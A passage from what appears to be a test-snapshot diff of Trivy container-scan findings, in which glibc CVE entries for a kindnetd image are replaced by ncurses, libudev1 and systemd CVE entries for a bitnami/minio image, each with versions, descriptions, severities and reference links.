"https://security.netapp.com/advisory/ntap-20221118-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://ubuntu.com/security/notices/USN-5707-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libtinfo6", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "name": "ncurses: segfaulting OOB read", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213488", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5477-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6099-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19126", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libtinfo6", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19126", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - "https://linux.oracle.com/cve/CVE-2019-19126.html", - "https://linux.oracle.com/errata/ELSA-2020-3861.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", ], }, "category": "Vulnerability", - "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", + "name": "Local users can trigger security-relevant memory corruption via malformed data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19126", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19126", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-27645", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-27645", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - "https://linux.oracle.com/cve/CVE-2021-27645.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - "https://security.gentoo.org/glsa/202107-07", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2021-27645", - ], - }, - "category": "Vulnerability", - "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-27645", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-27645", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33574", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33574", - "https://linux.oracle.com/cve/CVE-2021-33574.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210629-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", - "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: mq_notify does not handle separately allocated thread attributes", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33574", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33574", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-35942", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", - "https://access.redhat.com/security/cve/CVE-2021-35942", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", - "https://linux.oracle.com/cve/CVE-2021-35942.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", - "https://security.gentoo.org/glsa/202208-24", - "https://security.netapp.com/advisory/ntap-20210827-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", - "https://sourceware.org/glibc/wiki/Security%20Exceptions", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Arbitrary read in wordexp()", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-35942", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-35942", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", + ], + }, + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - 